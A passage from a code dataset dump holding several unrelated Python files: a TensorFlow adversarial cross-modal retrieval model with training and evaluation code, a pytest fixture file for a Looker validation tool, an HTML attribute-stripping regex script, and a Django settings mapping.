# triplet loss\n margin = self.model_params.margin\n alpha = self.model_params.alpha\n v_loss_pos = tf.reduce_sum(tf.nn.l2_loss(self.emb_v-self.emb_w_pos))\n v_loss_neg = tf.reduce_sum(tf.nn.l2_loss(self.emb_v-self.emb_w_neg))\n w_loss_pos = tf.reduce_sum(tf.nn.l2_loss(self.emb_w-self.emb_v_pos))\n w_loss_neg = tf.reduce_sum(tf.nn.l2_loss(self.emb_w-self.emb_v_neg))\n self.triplet_loss = tf.maximum(0.,margin+alpha*v_loss_pos-v_loss_neg) + tf.maximum(0.,margin+alpha*w_loss_pos-w_loss_neg)\n\n logits_v = self.label_classifier(self.emb_v)\n logits_w = self.label_classifier(self.emb_w, reuse=True)\n self.label_loss = tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=logits_v) + \\\n tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=logits_w)\n self.label_loss = tf.reduce_mean(self.label_loss)\n self.label_img_pred = tf.argmax(logits_v, 1)\n self.label_img_acc = tf.reduce_mean(tf.cast(tf.equal(self.label_img_pred, tf.argmax(self.y, 1)), tf.float32))\n self.label_shape_pred = tf.argmax(logits_w, 1)\n self.label_shape_acc = tf.reduce_mean(\n tf.cast(tf.equal(self.label_shape_pred, tf.argmax(self.y, 1)), tf.float32))\n self.label_class_acc = tf.divide(tf.add(self.label_img_acc, self.label_shape_acc), 2.0)\n self.emb_loss = 100*self.label_loss + self.triplet_loss\n # self.emb_v_class = self.domain_classifier(self.emb_v, self.l)\n # self.emb_w_class = self.domain_classifier(self.emb_w, self.l, reuse=True)\n\n all_emb_v = tf.concat([tf.ones([self.model_params.batch_size, 1]),\n tf.zeros([self.model_params.batch_size, 1])], 1)\n all_emb_w = tf.concat([tf.zeros([self.model_params.batch_size, 1]),\n tf.ones([self.model_params.batch_size, 1])], 1)\n # self.domain_class_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.emb_v_class, labels=all_emb_w) + \\\n # tf.nn.softmax_cross_entropy_with_logits(logits=self.emb_w_class, labels=all_emb_v)\n # self.domain_class_loss = tf.reduce_mean(self.domain_class_loss)\n # self.domain_img_class_acc = tf.equal(tf.greater(0.5, self.emb_v_class), tf.greater(0.5, all_emb_w))\n # self.domain_shape_class_acc = tf.equal(tf.greater(self.emb_w_class, 0.5), tf.greater(all_emb_v, 0.5))\n # self.domain_class_acc = tf.reduce_mean(\n # tf.cast(tf.concat([self.domain_img_class_acc, self.domain_shape_class_acc], axis=0), tf.float32))\n\n # conditional D loss\n self.img_conditional_v_pred = self.img_conditional_classifier(self.tar_img, self.emb_v, self.l)\n self.img_conditional_w_pred = self.img_conditional_classifier(self.tar_img, self.emb_w, self.l, reuse=True)\n self.img_conditional_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.img_conditional_v_pred, labels=all_emb_w) + \\\n tf.nn.softmax_cross_entropy_with_logits(logits=self.img_conditional_w_pred, labels=all_emb_v)\n self.img_conditional_loss = tf.reduce_mean(self.img_conditional_loss)\n self.img_conditional_acc = tf.divide(tf.add(self.acc_op(self.img_conditional_v_pred, all_emb_w), self.acc_op(self.img_conditional_w_pred, all_emb_v)), 2.0)\n\n self.label_conditional_v_pred = self.label_conditional_classifier(self.tar_txt, self.emb_v, self.l)\n self.label_conditional_w_pred = self.label_conditional_classifier(self.tar_txt, self.emb_w, self.l, reuse=True)\n self.label_conditional_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.label_conditional_v_pred, labels=all_emb_w) + \\\n tf.nn.softmax_cross_entropy_with_logits(logits=self.label_conditional_w_pred, labels=all_emb_v)\n self.label_conditional_loss = tf.reduce_mean(self.label_conditional_loss)\n self.label_conditional_acc = tf.divide(tf.add(self.acc_op(self.label_conditional_v_pred, all_emb_w), self.acc_op(self.label_conditional_w_pred, all_emb_v)), 2.0)\n\n\n # Pair D loss\n # self.emb_pair_pred = self.pair_classifier(self.emb_v, self.emb_w, self.l)\n # self.emb_unpair_pred = self.pair_classifier(tf.concat([self.emb_v, self.emb_w_unpair], axis=0), tf.concat([self.emb_v_unpair, self.emb_w], axis=0), self.l, reuse=True)\n # pair_labels, unpair_labels = tf.ones([self.model_params.batch_size, 1]), tf.zeros([self.model_params.batch_size*2, 1])\n # self.pair_loss = tf.concat([tf.nn.sigmoid_cross_entropy_with_logits(logits=self.emb_pair_pred, labels=pair_labels), \\\n # tf.nn.sigmoid_cross_entropy_with_logits(logits=self.emb_unpair_pred, labels=unpair_labels)], axis=0)\n # self.pair_loss = tf.reduce_mean(self.pair_loss)\n # self.pair_acc = tf.equal(tf.greater(pair_labels, 0.5), tf.greater(self.emb_pair_pred, 0.5))\n # self.unpair_acc = tf.equal(tf.greater(0.5, unpair_labels), tf.greater(0.5, self.emb_unpair_pred))\n # self.pair_all_acc = tf.reduce_mean(tf.cast(tf.concat([self.pair_acc, self.unpair_acc], axis=0), tf.float32))\n # self.pair_acc = tf.reduce_mean(tf.cast(self.pair_acc, tf.float32))\n # self.unpair_acc = tf.reduce_mean(tf.cast(self.unpair_acc, tf.float32))\n\n # TODO G loss as paper\n # maximize domain class loss and minimize pair loss\n self.G_loss = self.emb_loss - self.model_params.r_domain * (self.img_conditional_loss + self.label_conditional_loss) # + self.model_params.r_pair * self.pair_loss\n\n self.t_vars = tf.trainable_variables()\n self.vf_vars = [v for v in self.t_vars if 'vf_' in v.name]\n self.le_vars = [v for v in self.t_vars if 'le_' in v.name]\n self.dc_vars = [v for v in self.t_vars if 'dc_' in v.name]\n self.icc_vars = [v for v in self.t_vars if 'icc_' in v.name] # image conditional D\n self.lcc_vars = [v for v in self.t_vars if 'lcc_' in v.name] # label conditional D\n self.lc_vars = [v for v in self.t_vars if 'lc_' in v.name]\n self.pc_vars = [v for v in self.t_vars if 'pc_' in v.name] # pair\n\n def acc_op(self, pred, label, threshold=0.5):\n return tf.reduce_mean(tf.cast(tf.equal(tf.greater(pred, threshold), tf.greater(label, threshold)), tf.float32))\n\n def visual_feature_embed(self, X, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n net = tf.nn.tanh(slim.fully_connected(X, 2000, scope='vf_fc_0'))\n # net = tf.nn.tanh(slim.fully_connected(net, 200, scope='vf_fc_1'))\n net = tf.nn.tanh(slim.fully_connected(net, self.model_params.semantic_emb_dim, scope='vf_fc_2'))\n return net\n\n def label_embed(self, L, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n net = tf.nn.tanh(slim.fully_connected(L, 500, scope='le_fc_0'))\n # net = tf.nn.tanh(slim.fully_connected(net, 100, scope='le_fc_1'))\n net = tf.nn.tanh(slim.fully_connected(net, self.model_params.semantic_emb_dim, scope='le_fc_2'))\n return net \n def label_classifier(self, X, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n net = slim.fully_connected(X, self.model_params.n_class, scope='lc_fc_0')\n return net \n def domain_classifier(self, E, l, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n E = flip_gradient(E, l)\n net = slim.fully_connected(E, self.model_params.semantic_emb_dim/2, scope='dc_fc_0')\n net = slim.fully_connected(net, self.model_params.semantic_emb_dim/4, scope='dc_fc_1')\n net = slim.fully_connected(net, 2, scope='dc_fc_2')\n return net\n\n def pair_classifier(self, V, W, l, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n V, W = flip_gradient(V, l), flip_gradient(W, l)\n net = slim.fully_connected(tf.concat([V, W], axis=1), self.model_params.semantic_emb_dim / 2, scope='pc_fc_0')\n net = slim.fully_connected(net, self.model_params.semantic_emb_dim/4, scope='pc_fc_1')\n net = slim.fully_connected(net, 1, scope='pc_fc_2')\n return net\n def label_conditional_classifier(self, ori_W, E, l, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n E = flip_gradient(E, l)\n net = slim.fully_connected(tf.concat([E, ori_W], axis=1), 512, scope='lcc_fc_0')\n net = slim.fully_connected(net, 100, scope='lcc_fc_1')\n net = slim.fully_connected(net, 2, scope='lcc_fc_2')\n return net\n\n def img_conditional_classifier(self, ori_V, E, l, is_training=False, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n E = flip_gradient(E, l)\n net = slim.fully_connected(tf.concat([E, ori_V], axis=1), 512, scope='icc_fc_0')\n net = slim.fully_connected(net, 100, scope='icc_fc_1')\n net = slim.fully_connected(net, 2, scope='icc_fc_2')\n return net\n\n def find_neg_pair(self, fcs1, fcs2):\n \"\"\"\n find negative pair for each value of fcs1 from fcs2\n :param fcs1:\n :param fcs2:\n :return:\n \"\"\"\n fcs1_np, fcs2_np = np.array(fcs1), np.array(fcs2)\n assert fcs1_np.shape[0] == fcs2_np.shape[0]\n size = fcs1_np.shape[0]\n sims = cosine_similarity(fcs1_np, fcs1_np)\n result = []\n for i in range(size):\n sims[i][i] = -1.0\n neg_index = np.argmax(sims[i, :], axis=0).astype(int)\n result.append(neg_index)\n return fcs2_np[result]\n\n def train(self, sess):\n #self.check_dirs()\n \n # total_loss = self.emb_loss + self.domain_class_loss\n # total_train_op = tf.train.AdamOptimizer(\n # learning_rate=self.model_params.lr_total,\n # beta1=0.5).minimize(total_loss)\n emb_train_op = tf.train.AdamOptimizer(\n learning_rate=self.model_params.lr_emb,\n beta1=0.5).minimize(self.G_loss, var_list=self.le_vars+self.vf_vars)\n img_conditionalD_train_op = tf.train.AdamOptimizer(\n learning_rate=self.model_params.lr_domain,\n beta1=0.5).minimize(self.img_conditional_loss, var_list=self.icc_vars)\n label_conditionalD_train_op = tf.train.AdamOptimizer(\n learning_rate=self.model_params.lr_domain,\n beta1=0.5).minimize(self.label_conditional_loss, var_list=self.lcc_vars)\n # pair_train_op = tf.train.AdamOptimizer(\n # learning_rate=self.model_params.lr_pair,\n # beta1=0.5).minimize(self.pair_loss, var_list=self.pc_vars)\n\n tf.global_variables_initializer().run()\n self.saver = tf.train.Saver()\n\n start_time = time.time()\n map_avg_ti = []\n map_avg_it = []\n adv_loss = []\n emb_loss = []\n for epoch in range(self.model_params.epoch):\n p = float(epoch) / self.model_params.epoch\n l = 2. / (1. + np.exp(-10. * p)) - 1\n for batch_feat, batch_vec, batch_labels, idx in self.data_iter.train_data():\n # create one-hot labels\n batch_labels_ = batch_labels - np.ones_like(batch_labels)\n label_binarizer = sklearn.preprocessing.LabelBinarizer()\n label_binarizer.fit(range(self.model_params.n_class))\n b = label_binarizer.transform(batch_labels_)\n adj_mat = np.dot(b,np.transpose(b))\n mask_mat = np.ones_like(adj_mat) - adj_mat\n img_sim_mat = mask_mat*cosine_similarity(batch_feat,batch_feat)\n txt_sim_mat = mask_mat*cosine_similarity(batch_vec,batch_vec)\n img_neg_txt_idx = np.argmax(img_sim_mat,axis=1).astype(int)\n txt_neg_img_idx = np.argmax(txt_sim_mat,axis=1).astype(int)\n #print('{0}'.format(img_neg_txt_idx.shape)\n batch_vec_ = np.array(batch_vec)\n batch_feat_ = np.array(batch_feat) \n img_neg_txt = batch_vec_[img_neg_txt_idx,:]\n txt_neg_img = batch_feat_[txt_neg_img_idx,:]\n img_unpair_txt = self.find_neg_pair(batch_feat, batch_vec)\n txt_unpair_img = self.find_neg_pair(batch_vec, batch_feat)\n #_, label_loss_val, dissimilar_loss_val, similar_loss_val = sess.run([total_train_op, self.label_loss, self.dissimilar_loss, self.similar_loss], feed_dict={self.tar_img: batch_feat, self.tar_txt: batch_vec, self.y: b, self.y_single: np.transpose([batch_labels]),self.l: l})\n # TODO no domain classifier\n # sess.run([emb_train_op, domain_train_op],\n sess.run([emb_train_op],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n sess.run([img_conditionalD_train_op],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n sess.run([label_conditionalD_train_op],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n label_loss_val, triplet_loss_val, emb_loss_val, img_conditional_loss_val, label_conditional_loss_val, g_loss_val, label_acc_val, img_conditional_acc_val, label_conditional_acc_val = \\\n sess.run([self.label_loss, self.triplet_loss, self.emb_loss, self.img_conditional_loss, self.label_conditional_loss, self.G_loss, self.label_class_acc, self.img_conditional_acc, self.label_conditional_acc],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n print('Epoch: [%2d][%4d/%4d] time: %4.4f, emb_loss: %.8f, img_conditional_loss: %.8f, label_conditional_loss: %.8f, label_loss: %.8f, triplet_loss: %.8f, g_loss: %.8f, label_acc:%.8f, img_conditional_acc:%.8f, label_conditional_acc:%.8f' %(\n epoch, idx, self.data_iter.num_train_batch, time.time() - start_time, emb_loss_val, img_conditional_loss_val, label_conditional_loss_val, label_loss_val, triplet_loss_val, g_loss_val, label_acc_val, img_conditional_acc_val, label_conditional_acc_val\n ))\n if (epoch+1) % self.model_params.n_save_epoch == 0:\n self.save(epoch+1, sess)\n # if epoch == (self.model_params.epoch - 1):\n # self.emb_v_eval, self.emb_w_eval = sess.run([self.emb_v, self.emb_w],\n # feed_dict={\n # self.tar_img: batch_feat,\n # self.tar_txt: batch_vec,\n # self.y: b,\n # self.y_single: np.transpose([batch_labels]),\n # self.l: l})\n # with open('./data/wikipedia_dataset/train_img_emb.pkl', 'wb') as f:\n # cPickle.dump(self.emb_v_eval, f, cPickle.HIGHEST_PROTOCOL)\n # with open('./data/wikipedia_dataset/train_txt_emb.pkl', 'wb') as f:\n # cPickle.dump(self.emb_w_eval, f, cPickle.HIGHEST_PROTOCOL)\n self.save(epoch, sess)\n def eval_random_rank(self):\n start = time.time()\n #with open('./data/wikipedia_dataset/test_labels.pkl', 'rb') as fpkl:\n # test_labels = cPickle.load(fpkl)\n with open('./data/wiki_shallow/L_te.pkl', 'rb') as fpkl:\n test_labels = cPickle.load(fpkl)\n k = self.model_params.top_k\n avg_precs = []\n for i in range(len(test_labels)):\n query_label = test_labels[i]\n\n # distances and sort by distances\n sorted_idx = range(len(test_labels))\n shuffle(sorted_idx)\n\n # for each k do top-k\n precs = []\n for topk in range(1, k + 1):\n hits = 0\n top_k = sorted_idx[0 : topk]\n if query_label != test_labels[top_k[-1]]:\n continue\n for ii in top_k:\n retrieved_label = test_labels[ii]\n if query_label != retrieved_label:\n hits += 1\n precs.append(float(hits) / float(topk))\n avg_precs.append(np.sum(precs) / float(k))\n mean_avg_prec = np.mean(avg_precs)\n print('[Eval - random] mAP: %f in %4.4fs' % (mean_avg_prec, (time.time() - start)))\n \n\n def eval(self, sess):\n start = time.time()\n self.saver = tf.train.Saver()\n self.load(sess)\n\n test_img_feats_trans = []\n test_txt_vecs_trans = []\n test_labels = []\n test_img_feats, test_txt_feats = np.array([]), np.array([])\n for feats, vecs, labels, i in self.data_iter.test_data():\n test_img_feats = np.concatenate([test_img_feats, feats], axis=0) if test_img_feats.shape[0] > 0 else np.array(feats)\n test_txt_feats = np.concatenate([test_txt_feats, vecs], axis=0) if test_txt_feats.shape[0] > 0 else np.array(vecs)\n feats_trans = sess.run(self.emb_v, feed_dict={self.tar_img: feats})\n vecs_trans = sess.run(self.emb_w, feed_dict={self.tar_txt: vecs})\n test_labels += labels\n for ii in range(len(feats)):\n test_img_feats_trans.append(feats_trans[ii])\n test_txt_vecs_trans.append(vecs_trans[ii])\n print(len(test_img_feats_trans))\n # img_txt_D = []\n # for feats in test_img_feats:\n # pair_sim = sess.run(self.emb_pair_pred, feed_dict={self.tar_img: np.tile(feats, (test_txt_feats.shape[0], 1)), self.tar_txt: test_txt_feats})\n # img_txt_D.append(pair_sim.tolist())\n # img_txt_D = np.reshape(img_txt_D, [len(img_txt_D), len(img_txt_D[0])])\n # pair_labels = np.zeros(img_txt_D.shape)\n # for i in range(pair_labels.shape[0]):\n # pair_labels[i][i] = 1.0\n # test_pair_acc = np.mean(np.equal(pair_labels > 0.5, img_txt_D > 0.5).astype(float))\n # print(\"eval pair acc:\", test_pair_acc)\n # dim2dis_func = np.vectorize(lambda s: 1.0 - s)\n # img_txt_D = dim2dis_func(img_txt_D)\n # np.save('img_txt_D_train', img_txt_D)\n # print(\"img2shape pair:\", img2shape(img_txt_D,\n # np.arange(0, test_img_feats.shape[0]), top_k=self.model_params.top_k,\n # tag=\"acmr-triplet-img2shape\", save_dir='./result'))\n # print(\"txt2img pair:\", img2shape(np.transpose(img_txt_D),\n # np.arange(0, test_txt_feats.shape[0]), top_k=self.model_params.top_k,\n # tag=\"acmr-triplet-txt2img\", save_dir='./result'))\n\n test_img_feats_trans = np.asarray(test_img_feats_trans)\n test_txt_vecs_trans = np.asarray(test_txt_vecs_trans)\n test_feats_trans = np.concatenate((test_img_feats_trans[0:1000], test_txt_vecs_trans[-1000:]))\n np.save('./result/feature/test_joint_img_feat', test_img_feats_trans)\n np.save('./result/feature/test_joint_txt_feat', test_img_feats_trans)\n np.save('./result/feature/test_labels', np.asarray(test_labels))\n #with open('./data/wikipedia_dataset/test_feats_transformed.pkl', 'wb') as f:\n # cPickle.dump(test_feats_trans, f, cPickle.HIGHEST_PROTOCOL) \n with open('./data/wiki_shallow/test_feats_transformed.pkl', 'wb') as f:\n cPickle.dump(test_feats_trans, f, cPickle.HIGHEST_PROTOCOL) \n print('[Eval] transformed test features in %4.4f' % (time.time() - start))\n top_k = self.model_params.top_k\n avg_precs = []\n all_precs = []\n for k in range(1, top_k+1):\n for i in range(len(test_txt_vecs_trans)):\n query_label = test_labels[i]\n\n # distances and sort by distances\n wv = test_txt_vecs_trans[i]\n diffs = test_img_feats_trans - wv\n dists = np.linalg.norm(diffs, axis=1)\n sorted_idx = np.argsort(dists)\n\n #for each k do top-k\n precs = []\n for topk in range(1, k + 1):\n hits = 0\n top_k = sorted_idx[0 : topk]\n if np.sum(query_label) != test_labels[top_k[-1]]:\n continue\n for ii in top_k:\n retrieved_label = test_labels[ii]\n if np.sum(retrieved_label) == query_label:\n hits += 1\n precs.append(float(hits) / float(topk))\n if len(precs) == 0:\n precs.append(0)\n avg_precs.append(np.average(precs))\n mean_avg_prec = np.mean(avg_precs)\n all_precs.append(mean_avg_prec)\n print('[Eval - txt2img] mAP: %f in %4.4fs' % (all_precs[0], (time.time() - start)))\n print(all_precs)\n t2i = all_precs[0]\n #with open('./data/wikipedia_dataset/txt2img_all_precision.pkl', 'wb') as f:\n # cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL) \n with open('./data/wiki_shallow/txt2img_all_precision.pkl', 'wb') as f:\n cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL) \n\n avg_precs = []\n all_precs = []\n\n for k in range(1, self.model_params.top_k+1):\n for i in range(len(test_img_feats_trans)):\n query_img_feat = test_img_feats_trans[i]\n ground_truth_label = test_labels[i]\n\n # calculate distance and sort\n diffs = test_txt_vecs_trans - query_img_feat\n dists = np.linalg.norm(diffs, axis=1)\n sorted_idx = np.argsort(dists)\n\n # for each k in top-k\n precs = []\n for topk in range(1, k + 1):\n hits = 0\n top_k = sorted_idx[0 : topk]\n if np.sum(ground_truth_label) != test_labels[top_k[-1]]:\n continue\n for ii in top_k:\n retrieved_label = test_labels[ii]\n if np.sum(ground_truth_label) == retrieved_label:\n hits += 1\n precs.append(float(hits) / float(topk))\n if len(precs) == 0:\n precs.append(0)\n avg_precs.append(np.average(precs))\n mean_avg_prec = np.mean(avg_precs)\n all_precs.append(mean_avg_prec) \n print('[Eval - img2txt] mAP: %f in %4.4fs' % (all_precs[0], (time.time() - start)))\n print(all_precs)\n \n \n #with open('./data/wikipedia_dataset/text_words_map.pkl', 'wb') as f:\n # cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL)\n with open('./data/wiki_shallow/text_words_map.pkl', 'wb') as f:\n cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL) \n #Text query \n\n #with open('./data/wikipedia_dataset/text_words_map.pkl', 'rb') as f:\n # txt_words = cPickle.load(f)\n #with open('./data/wikipedia_dataset/test_img_words.pkl', 'rb') as f:\n # img_words = cPickle.load(f)\n #with open('./data/wikipedia_dataset/test_txt_files.pkl', 'rb') as f:\n # test_txt_names = cPickle.load(f)\n #with open('./data/wikipedia_dataset/test_img_files.pkl', 'rb') as f:\n # test_img_names = cPickle.load(f) \n with open('./data/wikipedia_dataset/text_words_map.pkl', 'rb') as f:\n txt_words = cPickle.load(f)\n with open('./data/wikipedia_dataset/test_img_words.pkl', 'rb') as f:\n img_words = cPickle.load(f)\n with open('./data/wikipedia_dataset/test_txt_files.pkl', 'rb') as f:\n test_txt_names = cPickle.load(f)\n with open('./data/wikipedia_dataset/test_img_files.pkl', 'rb') as f:\n test_img_names = cPickle.load(f)\n\n print(test_img_feats_trans.shape[0])\n img2shape_pair_acc = img2shape(cdist(test_img_feats_trans, test_txt_vecs_trans),\n np.arange(0, test_img_feats_trans.shape[0]), top_k=self.model_params.top_k,\n tag=\"acmr-triplet-img2shape\", save_dir='./result')\n shape2img_pair_acc = img2shape(cdist(test_txt_vecs_trans, test_img_feats_trans), np.arange(0, test_img_feats_trans.shape[0]), top_k=self.model_params.top_k,\n tag=\"acmr-triplet-txt2img\", save_dir='./result')\n print('[Test - img2shape pair(Edu):]', img2shape_pair_acc)\n print('[Test - txt2img pair(Edu):]', shape2img_pair_acc)\n print('[Eval] finished precision-scope in %4.4fs' % (time.time() - start))\n\ndef dis_img_shape(img_fcs, shape_fcs):\n return cdist(img_fcs, shape_fcs)\ndef dis_shape_img(shape_fcs, img_fcs):\n return cdist(shape_fcs, img_fcs)\n\ndef img2shape(D, pair_img_model, top_k=50, tag=\"all\", save_dir=\"\"):\n # D = cdist(img_fcs, shape_fcs)\n image_N = D.shape[0]\n image2shape_retrieval_ranking = []\n for k in range(image_N):\n distances = D[k, :] # [float(distance) for distance in line.strip().split()]\n ranking = range(len(distances))\n ranking.sort(key=lambda rank: distances[rank])\n # print 'image %d \\t retrieval: %d' % (k, ranking.index(pair_img_model[k]) + 1)\n image2shape_retrieval_ranking.append(ranking.index(pair_img_model[k]) + 1)\n image2shape_topK_accuracies = []\n for topK in range(top_k):\n n = sum([r <= topK + 1 for r in image2shape_retrieval_ranking])\n image2shape_topK_accuracies.append(n / float(image_N))\n if save_dir and len(save_dir) > 0:\n np.savetxt(os.path.join(save_dir, 'image2txt_top%d_accuracy_%s.txt'%(top_k, tag)), image2shape_topK_accuracies, fmt='%.4f')\n return image2shape_topK_accuracies","sub_path":"models/adv_crossmodal_triplet_conditionalD_pascal.py","file_name":"adv_crossmodal_triplet_conditionalD_pascal.py","file_ext":"py","file_size_in_byte":33670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514237741","text":"from typing import Iterable\nimport os\nimport vcr\nimport json\nfrom github import Github as GitHub, Repository\nimport pytest\nfrom spectacles.client import LookerClient\nfrom spectacles.exceptions import SqlError\nfrom spectacles.lookml import Project, Model, Explore, Dimension\nfrom utils import load_resource\n\n\ndef filter_access_token(response):\n if \"access_token\" in response[\"body\"][\"string\"].decode():\n body = json.loads(response[\"body\"][\"string\"])\n del body[\"access_token\"]\n response[\"body\"][\"string\"] = json.dumps(body)\n return response\n\n\n@pytest.fixture(scope=\"session\")\ndef vcr_config():\n return {\"filter_headers\": [\"Authorization\"]}\n\n\n@pytest.fixture(scope=\"session\")\ndef looker_client() -> Iterable[LookerClient]:\n with vcr.use_cassette(\n \"tests/cassettes/init_client.yaml\",\n filter_post_data_parameters=[\"client_id\", \"client_secret\"],\n filter_headers=[\"Authorization\"],\n record_mode=\"all\",\n before_record_response=filter_access_token,\n decode_compressed_response=True,\n ):\n client = LookerClient(\n base_url=\"https://spectacles.looker.com\",\n client_id=os.environ.get(\"LOOKER_CLIENT_ID\", \"\"),\n client_secret=os.environ.get(\"LOOKER_CLIENT_SECRET\", \"\"),\n )\n client.update_workspace(\"production\")\n yield client\n\n\n@pytest.fixture(scope=\"session\")\ndef remote_repo() -> Repository:\n access_token = os.environ.get(\"GITHUB_ACCESS_TOKEN\")\n client = GitHub(access_token)\n with vcr.use_cassette(\n \"tests/cassettes/init_github.yaml\",\n filter_headers=[\"Authorization\"],\n decode_compressed_response=True,\n ):\n repo = client.get_repo(\"spectacles-ci/eye-exam\")\n return repo\n\n\n@pytest.fixture\ndef dimension():\n return Dimension(\n name=\"age\",\n model_name=\"eye_exam\",\n explore_name=\"users\",\n type=\"number\",\n tags=[],\n sql='${TABLE}.\"AGE\"',\n url=\"/projects/eye_exam/files/views%2Fusers.view.lkml?line=6\",\n )\n\n\n@pytest.fixture\ndef explore():\n return Explore(name=\"users\", model_name=\"eye_exam\")\n\n\n@pytest.fixture\ndef model():\n return Model(name=\"eye_exam\", project_name=\"eye_exam\", explores=[])\n\n\n@pytest.fixture\ndef project():\n return Project(name=\"eye_exam\", models=[])\n\n\n@pytest.fixture\ndef sql_error():\n return SqlError(\n dimension=\"users.age\",\n explore=\"users\",\n model=\"eye_exam\",\n sql=\"SELECT age FROM users WHERE 1=2 LIMIT 1\",\n message=\"An error occurred.\",\n explore_url=\"https://spectacles.looker.com/x/qCJsodAZ2Y22QZLbmD0Gvy\",\n )\n\n\n@pytest.fixture\ndef schema():\n return load_resource(\"validation_schema.json\")\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"532150034","text":"import re\n#reg=r'\\s+[^(href)]*=\\\"[^<>]+\\\"'\nreg = r'\\b(?!(?:href|src))\\w+=([\"\\']).+?\\1'\nwith open(r'input.txt','r',encoding='ISO-8859-15') as f_read:\n html= f_read.read()\n result = re.sub(reg,\"\",html) #remove the original style\n \n result = re.sub(r'<\\s*table\\s*>','',result) #modify the class of table\n #result = re.sub(r'<\\s*table\\s*>','
    ',result) #modify the class of table\n \n print(result)\n with open(r'output.txt','w',encoding='ISO-8859-15') as f_write: \n f_write.write(result)\n \n","sub_path":"python/removeHtml.py","file_name":"removeHtml.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477488089","text":"# -*- coding: utf-8 -*-\n__author__ = 'flanker'\nfrom djangofloor.iniconf import OptionParser, bool_setting\n\ndef x_accel_converter(value):\n if bool_setting(value):\n return [('{MEDIA_ROOT}/', '{MEDIA_URL}'), ]\n return []\n\n\nINI_MAPPING = [\n OptionParser('SERVER_NAME', 'global.server_name'),\n OptionParser('PROTOCOL', 'global.protocol'),\n OptionParser('BIND_ADDRESS', 'global.bind_address'),\n OptionParser('LOCAL_PATH', 'global.data_path'),\n OptionParser('ADMIN_EMAIL', 'global.admin_email'),\n OptionParser('TIME_ZONE', 'global.time_zone'),\n OptionParser('LANGUAGE_CODE', 'global.language_code'),\n OptionParser('USE_X_SEND_FILE', 'global.x_send_file', bool_setting),\n OptionParser('X_ACCEL_REDIRECT', 'global.x_accel_converter', x_accel_converter),\n OptionParser('FLOOR_AUTHENTICATION_HEADER', 'global.remote_user_header'),\n OptionParser('EXTRA_INSTALLED_APP', 'global.extra_app'),\n\n OptionParser('PUBLIC_BOOKMARKS', 'global.public_bookmarks', bool_setting),\n OptionParser('PUBLIC_PROXIES', 'global.public_proxies', bool_setting),\n OptionParser('PUBLIC_INDEX', 'global.public_index', bool_setting),\n OptionParser('PUBLIC_DOCS', 'global.public_docs', bool_setting),\n\n OptionParser('ES_HOSTS', 'elasticsearch.hosts'),\n OptionParser('ES_INDEX', 'elasticsearch.index'),\n\n OptionParser('REDIS_HOST', 'redis.host'),\n OptionParser('REDIS_PORT', 'redis.port'),\n\n OptionParser('DATABASE_ENGINE', 'database.engine'),\n OptionParser('DATABASE_NAME', 'database.name'),\n OptionParser('DATABASE_USER', 'database.user'),\n OptionParser('DATABASE_PASSWORD', 'database.password'),\n OptionParser('DATABASE_HOST', 'database.host'),\n OptionParser('DATABASE_PORT', 'database.port'),\n\n]\n","sub_path":"updoc/iniconf.py","file_name":"iniconf.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"288671300","text":"import json\n\n\ndef check_empty():\n with open('stats', 'r') as f:\n txt = f.read()\n if txt == '':\n loaded_stats = {'Bot': 0, 'Human': 0}\n else:\n return\n encoded_stats = json.JSONEncoder().encode(loaded_stats)\n with open('stats', 'w') as f:\n f.write(encoded_stats)\n\n\ndef 